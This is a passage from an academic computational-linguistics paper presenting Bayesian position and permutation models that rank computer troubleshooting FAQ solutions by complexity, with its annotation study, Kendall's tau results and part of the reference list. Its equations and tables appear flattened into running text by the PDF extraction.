0 5 10 15 20 25 30 35 40 45 50 55 60 65 70 F re qu en cy Figure 1: Histogram of solution set sizes of any interaction with other users or their devices and thus constitute a generic list of steps to try out. We assume that in such a situation, the solution providers are likely to suggest simpler solutions be- fore other complex ones, leading to the solution lists being approximately ordered from low to high com- plexity. In the next section, we verify this assump- tion experimentally. In this dataset, the solution set size varies between 2 and 16 and the average number is 4.61. Figure 1 illustrates the histogram of solution set sizes found in our corpus. We only considered problems which have no less than two solutions. All words in the corpus were lemmatized and html links and numbers were replaced with placeholders. The resulting vocabulary was approximately 2,400 word types (62,152 tokens). Note that our dataset provides only weak super- vision for learning. The relative complexity of so- lutions for the same problem is observed, however, the relative complexity of solutions across different problems is unknown. For example, a hardware is- sue may generally receive highly complex solutions whereas a microphone issue mostly simple ones. 3.2 Task Validation In this section, we detail an annotation experiment where we asked human judges to rank the randomly permuted contents of a solution set according to per- ceived complexity. We performed this study for two reasons. Firstly, to ascertain that participants are able to distinguish degrees of complexity and agree on the complexity level of a solution. Secondly, to examine whether the ordering produced by partici- pants corresponds to the (gold-standard) FAQ order of the solutions. If true, this would support our hy- 75 www.computerhope.com http://www.homepages.inf.ed.ac.uk/alouis/solutionComplexity.html http://www.homepages.inf.ed.ac.uk/alouis/solutionComplexity.html http://www.homepages.inf.ed.ac.uk/alouis/solutionComplexity.html B C D FAQ A 0.421 0.525 0.625 0.465 B 0.436 0.434 0.252 C 0.584 0.303 D 0.402 Table 2: Correlation matrix for annotators (A–D) and original FAQ order using Kendall’s τ (values are aver- ages over 100 problem-solution sets). pothesis that the solutions in our FAQ corpus are fre- quently presented according to complexity and that this ordering is reasonable supervision for our mod- els. Method We randomly sampled 100 solution sets (their sizes vary between 2 and 16) from the FAQ corpus described in the previous section and randomly permuted the contents of each set. Four annotators, one an author of this paper, and three graduate and undergraduate students in Computer Science were asked to order the solutions in each set from easy to most complex. An easier solution was defined as one “which takes less time or effort to carry out by a user”. The annotators saw a list of solutions for the same problem on a web interface and assigned a rank to each solution to create an or- der. No ties were allowed and a complete ordering was required to keep the annotation simple. The an- notators were fluent English speakers and had some knowledge of computer hardware and software. We refrained from including novice users in our study as they are likely to have very different personal pref- erences resulting in more divergent rankings. Results We measured inter-annotator agreement using Kendall’s τ, a metric of rank correlation which has been reliably used in information ordering eval- uations (Lapata, 2006; Bollegala et al., 2006; Mad- nani et al., 2007). τ ranges between −1 and +1, where +1 indicates equivalent rankings, −1 com- pletely reverse rankings, and 0 independent rank- ings. Table 2 shows the pairwise inter-annotator agreement as well as the agreement between each annotator and the original FAQ order. The table shows fair agreement between the annotators con- firming that this is a reasonable task for humans to do. As can be seen, there are some individual dif- ferences, with the inter-annotator agreement varying from 0.421 (for A,B) to 0.625 (for A,D). The last column in Table 2 reports the agreement between our annotator rankings and the original or- dering of solutions in the FAQ data. Although there is fair agreement with the FAQ providing support for its use as a gold-standard, the overall τ values are lower compared to inter-annotator agreement. This implies that the ordering may not be strictly increas- ing in complexity in our dataset and that our models should allow for some flexibility during learning. Several reasons contributed to disagreements be- tween annotators and with the FAQ ordering, such as the users’ expertise, personal preferences, or the nature of the solutions. For instance, annotators dis- agreed when multiple solutions were of similar com- plexity. For the first example in Table 1, all anno- tators agreed perfectly and also matched the FAQ order. For the second example, the annotators dis- agreed with each other and the FAQ. 4 Generative Models In the following we introduce two Bayesian topic models for the complexity prediction (and rank- ing) task. In these models, complexity is captured through a discrete set D of L levels and a total or- dering between the levels reflects their relative com- plexity. In other words, D = (d1,d2, ...dL), where d1 is easiest level and D(dm) < D(dm+1) . Each complexity level is parametrized by a unigram lan- guage model which captures words likely to occur in solutions with that level. Our two models are broadly similar. Their gen- erative process assigns a complexity level from D to each solution such that it explains the words in the solution and also the ordering of solu- tions within each solution set. Words are gener- ated for each solution by mixing problem-specific words with solution-specific (and hence complexity- related) ones. Also, each problem has its own distri- bution over complexity levels which allows for some problems to have more complex solutions on aver- age, some a mix of high and low complexity solu- tions, or otherwise predominantly easier solutions. The main difference between the two models is in the way they capture the ordering between levels. Our first model infers a distribution for each level over the positions at which a solution with that com- plexity can occur and uses this distribution to order the levels. Levels which on average occur at greater positions have higher complexity. The second model defines probabilities over orderings of levels in the 76 Corpus level For each complexity level dm, 1 ≤ m ≤ L, - Draw a complexity vocabulary distribution φm ∼ Dirichlet(α) - Draw a distribution over positions γm ∼ Dirichlet(ρ) - Draw a distribution ψ for the proportion of complexity- versus problem-specific vocabulary ∼ Beta(δ0, δ1) Solution set level For each solution set Qi in the corpus, 1 ≤ i ≤ N, - Draw a distribution over the complexity levels θi ∼ Dirichlet(β) - Draw a problem-specific vocabulary distribution λi ∼ Dirichlet(ω) Individual solution level For each solution xij in Qi, 1 ≤ j ≤ NPi , - Draw a complexity level assignment, zij ∼ Multinomial(θi) - Draw a position depending on the level assigned, rij ∼ Multinomial(γzij ) Word level For each word wijk in solution xij , - Draw a switch value to indicate if the word is problem- or complexity-specific, sijk ∼ Binomial(ψ) - If sijk = 0, draw wijk ∼ Multinomial(φzij ) - If sijk = 1, draw wijk ∼ Multinomial(λi) Figure 2: Generative process for the Position Model generative process itself. The inference process of this model allows to directly uncover a canonical or- dering of the levels which explains the training data. 4.1 Expected Position model This model infers the vocabulary associated with a complexity level and a distribution over the numer- ical positions in a solution set where such a com- plexity level is likely to occur. After inference, the model uses the position distribution to compute the expected position of each complexity level. The lev- els are ordered from low to high expected position and taken as the order of increasing complexity. The generative process for our model is described in Figure 2. A first phase generates the latent vari- ables which are drawn once for the entire corpus. Then, variables are drawn for a solution set, next for each solution in the set, and finally for the words in the solutions. The number of complexity levels L is a parameter in the model, while the vocabulary size V is fixed. For each complexity level dm, we draw one multinomial distribution φ over the vocab- ulary V , and another multinomial γ over the pos- sible positions. These two distributions are drawn from symmetric Dirichlet priors with hyperparame- ters α and ρ. Solutions will not only contain words relating to their complexity but also to the prob- lem or malfunctioning component at hand. We as- sume these words play a minor role in determining complexity and thus draw a binomial distribution ψ that balances the amount of problem-specific ver- sus complexity-specific vocabulary. This distribu- tion has a Beta prior with hyperparameters δ0 and δ1. For each solution set, we draw a distribution over the complexity levels θ from another Dirichlet prior with concentration β. This distribution allows each problem to take a different preference and mix of complexity levels for its solutions. Another multino- mial λ over the vocabulary is drawn for the problem- specific content of each solution set. λ is given a symmetric Dirichlet prior with concentration ω. For each individual solution in a set, we draw a complexity level z from θ, i.e., the complexity level proportions for that problem. A position for the so- lution is then drawn from the position distribution for that level, i.e., γz. The words in the solution are generated by first drawing a switch value for each word indicating if the word came from the problem’s technical or complexity vocabulary. Accordingly, the word is drawn from λ or φz. During inference, we are interested in the poste- rior of the model given the FAQ training data. Based on the conditional independencies of the model, the posterior is proportional to: P(ψ|δ0,δ1)× L∏ m=1 [P(φm|α)]× L∏ m=1 [P(γm|ρ)] × N∏ i=1 [P(θi|β)]× N∏ i=1 [P(λi|ω)] × N∏ i=1 NPi∏ j=1 [P(zij|θi)P(rij|γzij )] × N∏ i=1 NPi∏ j=1 |xij|∏ k=1 [P(sijk|ψ)P(wijk|sijk,φzij,λi)] where L is the number of complexity levels, N the number of problems in the training corpus, NPi the size of solution set for problem Pi, and |xij| the number of words in solution xij. The use of conjugate priors for the multinomial 77 and binomial distributions allows us to integrate out the ψ, φ, γ, λ and θ distributions. The simplified posterior is proportional to: N∏ i=1 L∏ m=1 Γ(Rmi +βm) Γ ( L∑ m=1 Rmi +βm ) × L∏ m=1 G∏ r=1 Γ(Qrm+ρr) Γ ( G∑ r=1 Qrm+ρr ) × 1∏ u=0 Γ(Tu+δu) Γ ( 1∑ u=0 Tu+δu ) × L∏ m=1 V∏ v=1 Γ(T0m(v)+αv) Γ ( V∑ v=1 T0m(v)+αv ) × N∏ i=1 V∏ v=1 Γ(T1i (v)+ωv) Γ ( V∑ v=1 T1i (v)+ωv ) where Rmi is the number of times level m is as- signed to a solution in problem i. Qrm is the num- ber of times a solution with position r is given com- plexity m over the full corpus. Positions are integer values between 1 and G. T 0 and T 1 count the num- ber of switch assignments of value 0 (complexity- related word) and 1 (technical word) respectively in the corpus. T 0m(v) is a refined count of the number of times word type v is assigned switch value 0 in a solution of complexity m. T 1i (v) counts the number of times switch value 1 is given to word type v in a solution set for problem i. We sample from this posterior using a collapsed Gibbs sampling algorithm. The sampling sequence starts with a random initialization to the hidden vari- ables. During each iteration, the sampler chooses a complexity level for each solution based on the current assignments to all other variables. Then the switch values for the words in each solution are sam- pled one by one. The hyperparameters are tuned us- ing grid search on development data. The language model concentrations α, ρ and ω are given values less than 1 to obtain sparse distributions. The prior on θ, the topic proportions, is chosen to be greater than 1 to encourage different complexity levels to be used within the same problem rather than assigning all solutions to the same one or two levels. Similarly, δ0 and δ1 are > 1. We run 5,000 sampling iterations and use the last sample as a draw from the posterior. Using these assignments, we also compute an esti- mate for the parameters φm, λi and γm. For exam- ple, the probability of a word v in φm is computed as T 0 m(v)+αv∑ v(T 0 m(v)+αv) . After inference, we obtain probability distribu- tions for each complexity level dm over the vocabu- lary φm and positions γm. We compute the expected position Ep of dm as: Ep(dm) = G∑ pos=1 pos ∗γm(pos) (1) where pos indicates position values. Then, we rank the levels in increasing order of Ep. 4.2 Permutations-based model In our second model we incorporate the ordering of complexity levels in the generative process itself. This is achieved by using the Generalized Mallows Model (GMM; Fligner and Verducci (1986)) within our hierarchical generative process. The GMM is a probabilistic model over permutations of items and is frequently used to learn a consensus ordering given a set of different rankings. It assumes there is an underlying canonical order of items and concen- trates probability mass on those permutations that differ from the canonical order by a small amount, while assigning lesser probability to very divergent permutations. Probabilistic inference in this model uncovers the canonical ordering. The standard Mallows model (Mallows, 1957) has two parameters, a canonical ordering σ and a dispersion penalty ρ > 0. The probability of an ob- served ordering π is defined as: P(π|ρ,σ) = e −ρd(π,σ) ξ(ρ) , where d(π,σ) is a distance measure such as Kendall’s τ, between the canonical ordering σ and an observed ordering π. The GMM decomposes d(π,σ) in a way that captures item-specific dis- tance. This is done by computing an inversion vec- tor representation of d(π,σ). A permutation π of n items can be equivalently represented by a vector of inversion counts v of length n−1, where each com- ponent vi equals the number of items j > i that oc- cur before item i in π. The dimension of v is n− 1 since there can be no items greater than the high- est value element. A unique inversion vector can be computed for any permutation and vice versa, and the sum of the inversion vector elements is equal to d(π,σ). Each vi is also given a separate disper- sion penalty ρi. Then, the GMM is defined as: GMM(v|ρ) ∝ ∏ i e−ρivi (2) 78 Corpus level For each complexity level dm, 1 ≤ m ≤ L, - Draw a complexity vocabulary distribution φm ∼ Dirichlet(α) - Draw the L − 1 dispersion parameters ρr ∼ GMM0(µ0,v0r) - Draw a distribution ψ for the proportion of complexity- versus problem-specific vocabulary ∼ Beta(δ0, δ1) Solution set level For each solution set Qi in the corpus, 1 ≤ i ≤ N, - Draw a distribution over the complexity levels θi ∼ Dirichlet(β) - Draw a problem-specific vocabulary distribution λi ∼ Dirichlet(ω) - Draw a bag of NPi levels for the solution set bi ∼ Multinomial(θi) - Draw an inversion vector vi vi ∼ GMM(ρ) - Compute permutation πi of levels using vi - Compute level assignments zi using πi and bi. Assign level zij to xij for 1 ≤ j ≤ NPi . Word level For each word wijk in solution xij , - Draw a switch value to indicate if the word is problem- or complexity-specific, sijk ∼ Binomial(ψ) - If sijk = 0, draw wijk ∼ Multinomial(φzij ) - If sijk = 1, draw wijk ∼ Multinomial(λi) Figure 3: Generative process for Permutation Model. And can be further factorized into item-specific components: GMMi(vi|ρi) ∝ e−ρivi (3) Since the GMM is a member of the exponential fam- ily, a conjugate prior can be defined for each disper- sion parameter ρi which allows for efficient infer- ence. We refer the interested reader to Chen et al. (2009a) for details on the prior distribution and nor- malization factor for the GMM distribution. Figure 3 formalizes the generative story of our own model which uses the GMM as a component. We assume the canonical order is the strictly increas- ing (1,2, ..,L) order. For each complexity level dm, we draw a distribution φ over the vocabulary. We also draw L−1 dispersion parameters from the con- jugate prior GMM0 density. Hyperparameters for this prior are set in a similar fashion to Chen et al. (2009a). As in the position model, we draw a binomial distribution, ψ (with a beta prior) over complexity- versus problem-specific vocabulary. At the solution set level, we draw a multinomial dis- tribution λ over the vocabulary and a multinomial distribution θ for the proportion of L levels for this problem. Both these distributions have Dirichlet pri- ors. Next, we generate an ordering for the complex- ity levels. We draw NPi complexity levels from θ, one for each solution in the set. Let b denote this bag of levels (e.g., b = (1,1,2,3,4,4,4) assuming 4 complexity levels and 7 solutions for a particular problem). We also draw an inversion vector v from the GMM distribution which advantageously allows for small differences from the canonical order. The z assignments are deterministically computed by or- dering the elements of b according to the permuta- tion defined by v. Given the conditional independencies of our model, the posterior is proportional to: L∏ m=1 [P(φm|α)]× L−1∏ r=1 [P(ρr|µ0,v0r)]×P(ψ|δ0,δ1) × N∏ i=1 [P(θi|β)×P(λi|ω)×P(vi|ρ)×P(bi|θi)] × N∏ i=1 NPi∏ j=1 |xij|∏ k=1 [P(sijk|ψ)P(wijk|sijk,φzij,λi)] where L is the number of complexity levels, N the total problems in the training corpus, NPi the size of solution set for problem Pi, and |xij| the number of words in solution xij. A simplified posterior can be obtained by integrating out the ψ, φ, λ, and θ distributions which is proportional to: N∏ i=1 L∏ m=1 Γ(Rmi +βm) Γ ( L∑ m=1 Rmi +βm ) × L−1∏ r=1 GMM0(ρr|µ0,v0r) × N∏ i=1 L−1∏ r=1 GMMr(vir|ρr)× 1∏ u=0 Γ(Tu+δu) Γ ( 1∑ u=0 Tu+δu ) × L∏ m=1 V∏ v=1 Γ(T0m(v)+αv) Γ ( V∑ v=1 T0m(v)+αv ) × N∏ i=1 V∏ v=1 Γ(T1i (v)+ωv) Γ ( V∑ v=1 T1i (v)+ωv ) where the R and T counts are defined similarly as in the Expected Position model. We use collapsed Gibbs sampling to compute samples from this posterior. The sampling sequence 79 Level 1 free, space, hard, drive, sure, range, make, least, more, op- erate, than, point, less, cause, slowly, access, may, problem Level 2 use, can, media, try, center, signal, network, make, file, sure, when, case, with, change, this, setting, type, remove Level 19 system, file, this, restore, do, can, then, use, hard, issue, NUM, will, disk, start, step, above, run, cleanup, drive, xp Level 20 registry, restore, may, virus, use, bio, setting, scanreg, first, ensure, can, page, about, find, install, additional, we, utility Table 3: Most likely words assigned to varying complex- ity levels by the permutations-based model. randomly initializes the hidden variables. For a cho- sen solution set Si, the sampler draws NPi levels (bi), one at a time conditioned on the assignments to all other hidden variables of the model. Then the inversion vector vi is created by sampling each vij in turn. At this point, the complexity level as- signments zi can be done deterministically given bi and vi. Then the words in each solution set are sampled one at a time. For the dispersion parame- ters, ρ, the normalization constant of the conjugate prior is not known. We sample from the unnormal- ized GMM0 distribution using slice sampling. Other hyperparameters of the model are tuned us- ing development data. The language model Dirichlet concentrations (α, ω) are chosen to encourage spar- sity and β > 1 as in the position model. We run the Gibbs sampler for 5,000 iterations; the disper- sion parameters are resampled every 10 iterations. The last sample is used as a draw from the posterior. 4.3 Model Output In this section we present examples of the complex- ity assignments created by our models. Table 3 shows the output of the permutations-based model with 20 levels. Each row contains the highest prob- ability words in a single level (from the distribu- tion φm). For the sake of brevity, we only show the two least and most complex levels. In general, we observe more specialized, technical terms in higher levels (e.g., restore, scanreg, registry) which one would expect to correlate with complex solutions. Also note that higher levels contain uncertainty de- noting words (e.g., can, find, may) which again are indicative of increasing complexity. Using these complexity vocabularies, our models Low complexity 1.0 Cable(s) of new external device are loose or power ca- bles are unplugged. Ensure that all cables are properly and securely connected and that pins in the cable or connector are not bent down. 1.0 Make sure your computer has at least 50MB of free hard drive space. If your computer has less than 50MB free, it may cause the computer to operate more slowly. 1.0 If the iPhone is in a protective case, remove it from the case. If there is a protective film on the display, remove the film. Medium complexity 5.7 Choose a lower video setting for your imported video. 5.5 The file property is set to read-only. To work around this issue, remove the read-only property. For more information about file properties, see View the prop- erties for a file. 5.1 The system is trying to start from a media device that is not bootable. Remove the media device from the drive. High complexity 10.0 If you are getting stopped at the CD-KEY or Serial Number verification, verify you are entering your cor- rect number. If you lost your number or key or it does not work, you will need to contact the developer of the program. Computer Hope will not provide any users with an alternate identification number. 10.0 The network controller is defective. Contact an autho- rized service provider. 9.9 Network controller interrupt is shared with an expan- sion board. Under the Computer Setup Advanced menu, change the resource settings for the board. Table 4: Example solutions with low, medium and high expected complexity values (position-based model with 10 complexity levels). The solutions come from various problem-solution sets in the training corpus. Expected complexity values are shown in the first column. can compute the expected complexity for any so- lution text, x. This value is given by [ ∑L m=1 m ∗ p(m|x)]. We estimate the second term, p(m|x), using a) the complexity level language models φm and b) a prior over levels given by the overall fre- quency of different levels on the training data. Ta- ble 4 presents examples of solution texts from our training data and their expected complexity under the position-model. We find that the model is able to distinguish intuitively complex solutions from sim- pler ones. Aside from measuring expected complex- ity in absolute terms, our models can also also or- der solutions in terms of relative complexity (see the evaluation in Section 5) and assign a complex- ity value to a problem as a whole. 80 Low Complexity Problems - Computer appears locked up and will not turn off when the power button is pressed. - A USB device, headphone, or microphone is not recognized by the computer. - Computer will not respond to USB keyboard or mouse. High Complexity Problems - Game software and driver issues. - Incorrect, missing or stale visible networks. - I get an error message that says that there is not enough disk space to publish the movie. What can I do? - Power LED flashes Red four times, once every second, fol- lowed by two second pause, and computer beeps four times. Table 5: Least and most complex problems based on the expected complexity of their solution set. Problems are shown with complexity 1–3 (top) and 8–9 (bottom) using the position-based model. As mentioned earlier, our models only observe the relative ordering of solutions to individual problems; the relative complexity of two solutions from differ- ent problems is not known. Nevertheless, the models are able to rate solutions on a global scale while ac- commodating problem-specific ordering sequences. Specifically, we can compute the expected complex- ity of the solution set for problem i, using the in- ferred distribution over levels θi: ∑L m=1 m × θim. Table 5 shows the complexity of different problems as predicted by the position model (with 10 levels). As can be seen, easy problems are associated with accessory components (e.g., mouse or keyboard), whereas complex problems are related to core hard- ware and operating system errors. 5 Evaluation Experiments In the previous section, we showed how our mod- els can assign an expected complexity value to a so- lution text or an entire problem. Now, we present evaluations based on model ability to order solutions according to relative complexity. 5.1 Solution Ordering Task We evaluated our models by presenting them with a randomly permuted set of solutions to a problem and examining the accuracy with which they reorder them from least to most complex. At first instance, it would be relatively straightforward to search for the sequence of solutions which has high likelihood under the models. Unfortunately, there are two prob- lems with this approach. Firstly, the likelihood un- der our models is intractable to compute, so we would need to adopt a simpler and less precise ap- proximation (such as the Hidden Markov Model dis- cussed below). Secondly, when the solution set size is large, we cannot enumerate all permutations and need to adopt an approximate search procedure. We opted for a discriminative ranking approach instead which uses the generative models to compute a rich set of features. This choice allows us to simul- taneously obtain features tapping on to different as- pects learned by the models and to use well-defined objective functions. Below, we briefly describe the features based on our generative models. We also present additional features used to create baselines for system comparison. Likelihood We created a Hidden Markov Model based on the sample from the posterior of our mod- els (for a similar HMM approximation of a Bayesian model see Elsner et al. (2007)). For our model, the HMM has L states, and each state sm corresponds to a complexity level dm. We used the complex- ity language models φm estimated from the poste- rior as the emission probability distribution for the corresponding states. The transition probabilities of the HMM were computed based on the complexity level assignments for the training solution sequences in our posterior sample. The probability of transi- tioning to state sj from state si, p(sj|si), is the con- ditional probability p(dj|di) computed as c(di,dj )c(di) , where c(di,dj) is the number of times the complex- ity level dj is assigned to a solution immediately fol- lowing a solution which was given complexity di. c(di) is the number of times complexity level di is assigned overall in the training corpus. We perform Laplace smoothing to avoid zero probability transi- tions between states: p(sj|si) = c(di,dj) + 1 c(di) + L (4) This HMM formulation allows us to use efficient dy- namic programming to compute the likelihood of a sequence of solutions. Given a solution set, we compute an ordering as follows. We enumerate all orderings for sets with size less than 6, and select the sequence with the highest likelihood. For larger sizes, we use a sim- ulated annealing search procedure which swaps two adjacent solutions in each step. The temperature was set to 50 initially and gradually reduced to 1. These 81 values were set using minimal tuning on the devel- opment data. After estimating the most likely se- quence for a solution set, we used the predicted rank of each solution as a feature in our discriminative model. Expected Complexity As mentioned earlier, we computed the expected complexity of a solution x as [ ∑L m=1 m∗p(m|x)], where the second term was estimated using a complexity level specific language model φm and a uniform prior over levels on the test set. As additional features, we used the solu- tion’s perplexity under each φm, and under each of the technical topics λi, and also the most likely level for the text arg maxm p(m|x). Finally, we included features for each word in the training data. The fea- ture value is the word’s expected level multiplied by the probability of the word in the solution text. Length We also investigated whether solution length is a predictor of complexity (e.g., simple so- lutions may vary in length and amount of detail from complex ones). We devised three features based on the number of sentences (within a solution), words, and average sentence length. Syntax/Semantics Another related class of fea- tures estimates solution complexity based on sen- tence structure and meaning. We obtained eight syntactic features based on the number of nouns, verbs, adjectives and adverbs, prepositions, pro- nouns, wh-adverbs, modals, and punctuation. Other features compute the average and maximum depth of constituent parse trees. The part-of-speech tags and parse trees were obtained using the Stanford CoreNLP toolkit (Manning et al., 2014). In addi- tion, we computed 10 semantic features using Word- Net (Miller, 1995). They are the average num- ber of senses for each category (noun, verb, adjec- tive/adverb), and the maximum number of senses for the same three classes. We also include the aver- age and maximum lengths of the path to the root of the hypernym tree for nouns and verbs. This class of features roughly approximates the indicators typ- ically used in predicting text readability (Schwarm and Ostendorf, 2005; McNamara et al., 2014). 5.2 Experimental Setup We performed 10-fold cross-validation. We trained the ranking model on 240 problem-solution sets; 30 sets were reserved for development and 30 for testing (in each fold). The most frequent 20 words in each training set were filtered as stopwords. The de- velopment data was used to tune the parameters and hyperparameters of the models and the number of complexity levels. We experimented with ranges [5– 20] and found that the best number of levels was 10 for the position model and 20 for the permutation- based model, respectively. For the expected posi- tion model, positions were normalized before train- ing. Let solution xir denote the rth solution in the solution set for problem Pi, where 1 ≤ r ≤ NPi . We normalize r to a value between 0 and 1 using a min-max method: r′ = r−1 NPi−1 . Then the [0–1] range is divided into k bins. The identity of the bin containing r′ is taken as the normalized position, r. We tuned k experimentally during development and found that k = 3 performed best. For our ordering experiments we used Joachims’ (2006) SVMRank package for training and testing. During training, the classifier learns to minimize the number of swapped pairs of solutions over the train- ing data. We used a linear kernel and the regulariza- tion parameter was tuned using grid search on the development data of each fold. We evaluate how well the model’s output agrees with gold-standard ordering using Kendall’s τ. 5.3 Results Table 6 summarizes our results (average Kendall’s τ across folds). We present the results of the dis- criminative ranker when using a single feature class based on likelihood and expected complexity (Posi- tion, Permutation), length, and syntactico-semantic features (SynSem), and their combinations (denoted via +). We also report the performance of a base- line which computes a random permutation for each solution set (Random; results are averaged over five runs). We show results for all solution sets (All) and broken down into different set sizes (e.g., 2–3, 4–5). As can be seen, the expected position model ob- tains an overall τ of 0.30 and the permutation model of 0.26. These values lie in the range of human annotator agreement with the FAQ order (see Sec- tion 3.2). In addition, we find that the models perform consistently across solution set sizes, with even higher correlations on longer sequences where our methods are likely to be more useful. Posi- tion and Permutation outperform Random rankings and a model based solely on Length features. The 82 Solution set sizes Model 2–3 4–5 > 5 All (133) (81) (86) (300) Random -0.002 0.027 -0.006 0.004 Length -0.052 -0.066 -0.028 -0.002 SynSem 0.167 0.109 0.149 0.146 Length+SynSem 0.122 0.109 0.158 0.129 Position 0.288 0.242 0.381 0.302 +Length 0.283 0.251 0.363 0.297 +SynSem 0.343 0.263 0.367 0.328 +SynSem+Length 0.348 0.263 0.368 0.331 Permutation 0.253 0.206 0.341 0.265 +Length 0.213 0.229 0.356 0.258 +SynSem 0.268 0.263 0.353 0.291 +SynSem+Length 0.253 0.254 0.354 0.282 Table 6: Kendall’s τ values on the solution reorder- ing task using 10-fold cross-validation and SVM ranking models with different features. The results are broken down by solution set size (the number of sets per size is shown within parentheses). Boldface indicates the best performing model for each set size. SynSem features which measure the complexity of writing in the text are somewhat better but still in- ferior compared to Position and Permutation. Us- ing a paired Wilcoxon signed-rank test, we com- pared the τ values obtained by the different mod- els. The Position and Permutation performed sig- nificantly better (p < 0.05) compared to Random, Length and SynSem baselines. However, τ differ- ences between Position and Permutation are not sta- tistically significant. With regard to feature com- binations, we observe that both models yield bet- ter performance when combined with Length or SynSem. The Position model improves with the addition of both Length and SynSem, whereas the Permutation model combines best with SynSem features. The Position+SynSem+Length model is significantly better than Permutation (p < 0.05) but not Permutation+SynSem+Length or Position alone (again under the Wilcoxon test). These results suggest that the solution ordering task is challenging with several factors influencing how a solution is perceived: the words used and their meaning, the writing style of the solution, and the amount of detail present in it. Our data comes from the FAQs produced by computer and operat- ing system manufacturers and other well-managed websites. As a result, the text in the FAQ solutions is of high quality. However, the same is not true Model Rank 1 Rank n Both Random 15.3 14.6 3.4 Length 18.1 16.3 6.8 SynSem 19.8 19.8 4.3 SynSem+Length 20.6 25.0 5.1 Position 31.0 37.0 13.7 +Length 36.2 36.2 18.9 +SynSem 34.4 35.3 16.3 +SynSem+Length 36.2 35.3 17.2 Permutation 28.4 37.0 12.0 +Length 30.1 37.0 15.5 +synsem 32.7 37.0 13.7 +SynSem+Length 32.7 37.9 13.7 Table 7: Model accuracy at predicting the easiest solution correctly (Rank 1), the most difficult one (Rank n), or both. Bold face indicates the best performing model for each rank. for community-generated solution texts on discus- sion forums. In the latter case, we conjecture that the style of writing is likely to play a bigger role in how users perceive complexity. We thus expect that the benefit of adding Length and SynSem features will become stronger when we apply our models to texts from online forums. We also computed how accurately the models identify the least and most complex solutions. For solution sets of size 5 and above (so that the task is non-trivial) we computed the number of times the rank one solution given by the models was also the easiest according to the FAQ gold-standard. Like- wise, we also computed how often the models cor- rectly predict the most complex solution. With Ran- dom rankings, the easiest and most difficult solu- tions are predicted correctly 15% of the time. Get- ting both correct for a single problem happens only 3% of the time. The Position+Length model overall performs best, identifying the easiest and most diffi- cult solution 36% of the time. Both types of solution are identified correctly 18% of the time. Interest- ingly, the generative models are better at predicting the most difficult solution (35–37%) compared to the easiest one (28–36%). One reason for this could be that there are multiple easy solutions to try out but the most difficult one is probably more unique and so easier to identify. Overall, we observe that the two generative mod- els perform comparably, with Position having a slight lead over Permutation. A key difference be- 83 tween the models is that during training Permutation observes the full ordering of solutions while Posi- tion observes solutions coming from a few normal- ized position bins. Also note that in the Permuta- tion model, multiple solutions with the same com- plexity level are grouped together in a solution set. This property of the model is advantageous for or- dering as solutions with similar complexity should be placed adjacent to each other. At the same time, if levels 1 and 2 are flipped in the permutation sampled from the GMM, then any solution with complexity level 1 will be ordered after the solution with com- plexity 2. The Position model on the other hand, contains no special facility for grouping solutions with the same complexity. In sum, Position can more flexibly assign complexity levels to individual solutions. 6 Conclusion This work contains a first proposal to organize and navigate crowd-generated troubleshooting data ac- cording to the complexity of the troubleshooting ac- tion. We showed that users perceive and agree on the complexity of alternative suggestions, and presented Bayesian generative models of the troubleshooting data which can sort solutions by complexity with a performance close to human agreement on the task. Our results suggest that search and summariza- tion tools for troubleshooting forum archives can be greatly improved by automatically predicting and using the complexity of the posted solutions. It should also be possible to build broad coverage au- tomated troubleshooting systems by bootstrapping from conversations in discussion forums. In the fu- ture, we plan to deploy our models in several tasks such as user authority prediction, expert interven- tion, and thread analysis. Furthermore, we aim to specialize our models to include category-specific complexity levels and also explore options for per- sonalizing rankings for individual users based on their knowledge of a topic and the history of their troubleshooting actions. Acknowledgements We would like to thank the editor and the anony- mous reviewers for their valuable feedback on an earlier draft of this paper. We are also thankful to members of the Probabilistic Models of Language reading group at the University of Edinburgh for their many suggestions and helpful discussions. The first author was supported by a Newton International Fellowship (NF120479) from the Royal Society and the British Academy. References R. Barzilay and M. Lapata. 2008. Modeling local coher- ence: An entity-based approach. Computational Lin- guistics, 34(1):1–34. R. Barzilay and L. Lee. 2004. Catching the drift: Proba- bilistic content models, with applications to generation and summarization. In Proceedings of NAACL-HLT, pages 113–120. D. Bollegala, N. Okazaki, and M. Ishizuka. 2006. A bottom-up approach to sentence ordering for multi-document summarization. In Proceedings of COLING-ACL, pages 385–392. S. R. K. Branavan, H. Chen, L. S. Zettlemoyer, and R. Barzilay. 2009. Reinforcement learning for map- ping instructions to actions. In Proceedings of ACL- IJCNLP, pages 82–90. S. R. K. Branavan, D. Silver, and R. Barzilay. 2011. Learning to win by reading manuals in a Monte-Carlo framework. In Proceedings of ACL-HLT, pages 268– 277. H. Chen, S. R. K. Branavan, R. Barzilay, and D. R. Karger. 2009a. Content modeling using latent per- mutations. Journal of Artificial Intelligence Research, 36(1):129–163. H. Chen, S.R.K. Branavan, R. Barzilay, and D.R. Karger. 2009b. Global models of document structure using latent permutations. In Proceedings of NAACL-HLT, pages 371–379. J. Eisenstein, J. Clarke, D. Goldwasser, and D. Roth. 2009. Reading to learn: Constructing features from semantic abstracts. In Proceedings of EMNLP, pages 958–967. M. Elsner, J. Austerweil, and E. Charniak. 2007. A uni- fied local and global model for discourse coherence. In Proceedings of NAACL-HLT, pages 436–443. M. A. Fligner and J. S. Verducci. 1986. Distance-based ranking models. Journal of the Royal Statistical Soci- ety, Series B, pages 359–369. D. Heckerman, J. S. Breese, and K. Rommelse. 1995. Decision-theoretic troubleshooting. Communications of the ACM, 38(3):49–57. T. Joachims. 2006. Training linear SVMs in linear time. In Proceedings of KDD, pages 217–226. S. Kim, L. Cavedon, and T. Baldwin. 2010. Classifying dialogue acts in one-on-one live chats. In Proceedings of EMNLP, pages 862–871. 84 M. Lapata. 2003. Probabilistic text structuring: Experi- ments with sentence ordering. In Proceedings of ACL, pages 545–552. M. Lapata. 2006. Automatic evaluation of information ordering. Computational Linguistics, 32(4):471–484. M. Lui and T. Baldwin. 2009. Classifying user forum participants: Separating the gurus from the hacks, and other tales of the internet. In Proceedings of the 2010 Australasian Language Technology Workshop, pages 49–57. N. Madnani, R. Passonneau, N. Ayan, J. Conroy, B. Dorr, J. Klavans, D. O’Leary, and J. Schlesinger. 2007. Measuring variability in sentence ordering for news summarization. In Proceedings of the Eleventh Eu- ropean Workshop on Natural Language Generation. C. L. Mallows. 1957. Non-null ranking models. i. Biometrika, 44(1/2):pp. 114–130. C. D. Manning, M. Surdeanu, J. Bauer, J. Finkel, S. J. Bethard, and D. McClosky. 2014. The Stanford CoreNLP natural language processing toolkit. In Pro- ceedings of ACL: System Demonstrations, pages 55– 